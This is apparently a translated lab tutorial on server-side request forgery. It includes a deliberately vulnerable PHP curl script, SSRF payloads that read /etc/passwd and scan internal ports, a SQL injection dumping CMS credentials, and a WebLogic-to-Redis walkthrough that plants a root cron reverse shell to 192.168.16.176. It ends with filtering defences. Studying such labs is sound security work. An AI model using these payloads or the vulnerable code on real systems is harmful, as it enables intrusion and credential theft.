Server-side request forgery (SSRF) and vulnerability recurrence

Server request forgery

1. Overview

The server sends an HTTP request based on the URL submitted by the user. Using the URL specified by the user, the web application can obtain image or file resources, etc. A typical example is Baidu’s image recognition function.

If there is no appropriate verification or filtering of the URL submitted by the user and the information returned by the remote server, there may be a “request forgery” defect. “Request forgery”, as the name suggests, the attacker forges normal requests to achieve the purpose of the attack. If “request forgery” occurs on the server side, then this vulnerability is called “server side request forgery”, and its English name is Server Side Request Forgery, or SSRF for short.

SSRF is an attack in which an attacker forges requests sent by a server.

1.1 SSRF scenario

1.1.1 PHP Principle

curl (command line tool), wget are both browsers under the command line, simulating browsers

CURL downloads network resources: curl + space + resource address + -O

wget downloads network resources: wget + resource address

Implementation using curl requires PHP extension component curl support.

<?php
//ssrf_curl.php

if(isset($_REQUEST['url']))//Determine whether the url parameter has been submitted, otherwise it will prompt to submit the url
{<!-- -->
$link = $_REQUEST['url'];//Assign the url parameter to $link
$fileName = './curled/'.time().".txt";
$curlObj = curl_init($link);//Create an object to initialize the curl object
$fp = fopen($fileName,'w');//After initialization, a file will be opened. This file is in the curled folder
\t
curl_setopt($curlObj,CURLOPT_FILE,$fp);//Write the requested content into $fp
curl_setopt($curlObj,CURLOPT_HEADER,0);
curl_setopt($curlObj,CURLOPT_FOLLOWLOCATION,TRUE);
\t
curl_exec($curlObj);//The server initiates a request through the submitted url
curl_close($curlObj);
fclose($fp);
\t
if(getimagesize($fileName))
    {<!-- -->
header("Content-Type:image/png");
}
\t
$fp = fopen($fileName,'r');
$result = fread($fp,filesize($fileName));
fclose($fp);
echo $result;
}
else
{<!-- -->
echo "?url=[url]";
}

?>

Copy the above code to the server where phpstudy is deployed

image-20230904135817557

Use a browser to access the curl.php web page

image-20230904140153123

Then enter ?url=http://www.baidu.com/img/PC_wenxin_1142bc061306e094e6eddaa3d9656145.gif

image-20230904140207617

When we submit a URL to the server, the server will send a request (most of the time a GET request) on our behalf. If the request is malicious and the server does not have the ability to identify it, it may cause a server-side request forgery (SSRF) vulnerability. If the attacker uses SSRF to conduct other vulnerability attacks (the attacker uses other servers, first submits the URL to the server and then the server sends HTTP requests to the attacked party on behalf of the attacker), then when the attacked party is attacked and performs attack backtracking It is difficult to find the attacker.

1.2 SSRF Principle

The server accepts the URL address from the client, and the server sends the URL request.

URLs entered by users are not properly filtered, resulting in arbitrary URLs being entered.

The response result is not checked and is output directly.

1.3 SSRF Hazards

  • port scan;

  • Intranet Web application fingerprint identification;

  • Attack intranet applications;

  • Read local files;

2. SSRF attack and defense

CTF: CTFHub

2.1 SSRF Exploitation

2.1.1 File access
?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

image-20230904163827060

What we see is not the real Baidu web page. The website we see is 192.168.16.136, and the Baidu web page is 192.168.16.136. The URL is submitted through the curl.php script. The content accessed by the url address is presented to us.

2.1.2 Port Scan
?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306

?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379
2.1.3 Reading local files
?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd

?url=file:C:\phpStudy_20161103\WWW\ssrf\curl.php

image-20230904164627815

2.1.4 Intranet application fingerprint identification

Some applications are deployed on the intranet.

<Directory "C:\phpStudy_20161103\WWW\phpMyAdmin">
#Order allow,deny
Order deny,allow
deny from all
allow from 127.0.0.1

</Directory>

By modifying the content of httpd.conf, copy the above code to the DocumentRoot (document root directory) in httpd.conf

image-20230904165604444

After modifying httpd.conf, restart phpstudy and access the local address on other clients again.

image-20230904165813110

Then only 127.0.0.1 will be allowed to access phpmyadmin

Intranet application fingerprint recognition.

?url=http://127.0.0.1/phpmyadmin/readme

image-20230904170056376

2.1.5 Attacking intranet web applications

Intranet security is often weak.

Access to the intranet can be achieved through SSRF vulnerabilities, allowing intranet applications to be attacked. There are many intranet web applications that can be attacked only through the GET method.

Set cms to only allow 127.0.0.1 access

<Directory "C:\phpStudy_20161103\WWW\cms">
#Order allow,deny
Order deny,allow
deny from all
allow from 127.0.0.1

</Directory>

image-20230904170945846

image-20230904171038872

Access cms through ssrf

?url=http://127.0.0.1/cms/show.php?
id=-33%20union%20select%201,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15%2
0from%20cms_users


?url=http://127.0.0.1/cms
?url=http://127.0.0.1/cms/show.php?id=1/**/and/**/1=2/**/union/**/select/**/1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15
If you use spaces as intervals, an error will occur and will not be echoed. Use /**/ instead of spaces

image-20230904171314812

image-20230904171908297

2.2 SSRF Example

Weblogic SSRF to GetShell

cd to vulhub/weblogic/ssrf

sudo docker-compose up -d

Access port 7001 of the local machine address

image-20230904173332403

access

http://192.168.16.176:7001/uddiexplorer/SearchPublicRegistries.jsp

image-20230904173712236

Click search and then use bp to capture the packet, send the data packet to the resender, and click send (send)

image-20230904190225247

There is www-3.ibm.com in the error report, and the operator parameter submitted in the post request packet also has www-3.ibm.com, and it is in a URL, so there is likely to be an SSRF vulnerability here.

Then generate a domain name in dnslog and test whether the operator parameter will parse the data submitted (test whether the operator parameter will make a request for the URL in its content)

image-20230904190956703

image-20230904191917102

Prove that the test operator parameter makes a request to the url in its content

Change the url to 127.0.0.1 and try the test again

image-20230904192239244

It is known that port 80 is not open

Testing ports 7001 and 7002

image-20230904192927809

To detect the local port, the target is generally a docker environment. Intranet IP range of docker environment: 172.16.0.1, 172.17.0.1, 172.18.0.1, 172.19.0.1

172.16.0.1:7001, 172.17.0.1:7001, 172.18.0.1:7001, 172.19.0.1:7001 have the same results, proving that 16, 17, 18, 19, and 20 all have ports 7001

image-20230904195023263

However, 172.20.0.2 does not open port 7001, but may open other ports.

image-20230904195849237

Redis means that you can read data, write data or write ssh public key, obtain webshell, and schedule tasks periodically. Because terminal 80 and terminal 22 are not open, and there is no echo, try to write a periodic scheduled task to obtain a shell.

Scan port 21 using a Swiss Army Knife

nc -lnvp 21

image-20230904201531856

set 1 "\
\
\
\
0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i > & amp; /dev/tcp/192.168.16.176/21 0> &1'\
\
\
\
"
config set dir /etc/
config set dbfilename crontab
save

Because scheduled tasks need to be submitted through http, the scheduled tasks are URL-encoded.

set 1 "\
\
\
\
0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.16.176/21 0> &1'\
\
\
\
"config set dir /etc/config set dbfilename crontabsave

http://172.20.0.2:6379/xjset 1 "\
\
\
\
0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.16.176/21 0>&1'\ n\
\
\
"config set dir /etc/config set dbfilename crontabsavexj

image-20230904201346059

Click submit, and then get the docker rebound shell

image-20230904201701008

image-20230904201755910

image-20230904201848010

2.3 SSRF Defense

2.3.1 Filter input
  • Restrict protocols to allow only http or https protocols;
  • Restrict IPs to prevent applications from being used to obtain intranet data and attack the intranet;
  • Restrict ports, restrict request ports to commonly used ports.
2.3.2 Filter output

  • Filter the returned information, and filter all information that does not meet the requirements;

  • Unify error information so that attacks cannot judge intranet information.

3. SSRF mining

Web Function URL Keyword
Share
transcoding service
online translation
Image loading and downloading
Picture and article collection function
Unpublished API implementation		 share
wap
url
link
src
source
target
u
3g
display
sourceURL
imageURL
domain